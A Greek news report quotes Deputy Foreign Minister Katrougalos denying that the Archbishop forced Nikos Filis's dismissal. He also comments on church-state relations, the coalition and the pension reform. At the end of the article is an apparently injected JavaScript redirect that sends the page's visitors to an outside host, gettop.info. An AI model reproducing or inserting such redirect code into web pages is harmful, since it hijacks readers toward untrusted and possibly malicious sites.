Κατρούγκαλος: Η αποπομπή Φίλη δεν έγινε κατ’ απαίτηση του Αρχιεπισκόπου

0
5

 

Πολιτική της κυβέρνησης παραμένει ότι Κράτος και Εκκλησία θα πρέπει να έχουν διακριτούς ρόλους, όμως αυτή η διάκριση θα γίνει με συναινετικές διαδικασίες, δήλωσε στον ΣΚΑΪ ο αναπληρωτής υπουργός Εξωτερικών Γιώργος Κατρούγκαλος.

Η δήλωσή του έρχεται στον απόηχο της απομάκρυνσης του Νίκου Φίλη από το υπουργείο Παιδείας υπό τη σκιά της αντιπαράθεσής του με τον Αρχιεπίσκοπο Ιερώνυμο για τη διδασκαλία των Θρησκευτικών, και λίγες ώρες πριν το τετ-α-τετ του πρώην υπουργού με τον πρωθυπουργό στο Πολιτικό Συμβούλιο του ΣΥΡΙΖΑ.

Ο κ. Κατρούγκαλος σημείωσε ότι ο κ. Φίλης είχε πετυχημένη θητεία, που βαθμολογήθηκε με «20 συν» από τον Αλέξη Τσίπρα, όμως επισήμανε πως η θρησκευτική ουδετερότητα του κράτους δεν είναι δυνατόν να διασφαλίζεται σε «συνθήκες πολέμου» με την Εκκλησία.

Ο αναπληρωτής ΥΠΕΞ αρνήθηκε παράλληλα ότι υπήρξαν καθοριστικές πιέσεις για το θέμα Φίλη από τον αρχιεπίσκοπο ή τον κυβερνητικό εταίρο Πάνο Κάμμένο.

«Αυτός που καθορίζει την επιλογή των υπουργών είναι ο πρωθυπουργός», ανέφερε. Προσέθεσε ότι θεωρεί τους Ανεξάρτητους Έλληνες «αξιόπιστο σύμμαχο» και υπενθύμισε ότι παρά τις διαφωνίες που υπήρξαν σε άλλα ζητήματα δεν προκάλεσαν αστάθεια στην κυβέρνηση.

Τέλος, ο κ. Κατρούγκαλος απάντησε και για τα σχόλια εναντίον της διαδόχου του στο υπουργείο Εργασίας, Έφης Αχτσιόγλου, κάνοντας λόγο για εκτεταμένο και βρώμικο πόλεμο στον οποίο αυτή τη φορά έχει υπεισέρθει ο ηλικιακός και ο σεξιστικός παράγοντας.

Σε αυτή τη χώρα επικρατεί η λογική πως αν κάποιος δεν πάει 50-60 ετών δεν μπορεί να πάρει δημόσιο ρόλο ή να καταλάβει δημόσια θέση, σημείωσε.

«Με τον ανασχηματισμό, ο πρωθυπουργός θέλησε να τονώσει την ομοιογένεια του σχήματος και να δώσει μια νέα ορμή, με την είσοδο άφθαρτων προσώπων στην κυβέρνηση» δήλωσε.

Επανέλαβε ότι το ασφαλιστικό έχει κλείσει και δεν ξανανοίγει και υποστήριξε πως το γεγονός ότι αντιδρά το ΔΝΤ δείχνει πως είναι πετυχήμενη η μεταρρύθμιση.

Τέλος, τόνισε πως είναι ευχαριστημένος με τη μετακίνησή του στο υπουργείο Εξωτερικών αφού «έκλεισε ένας επιτυχημένος κύκλος και τώρα ανοίγει ένας νέος με νέες προκλήσεις». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here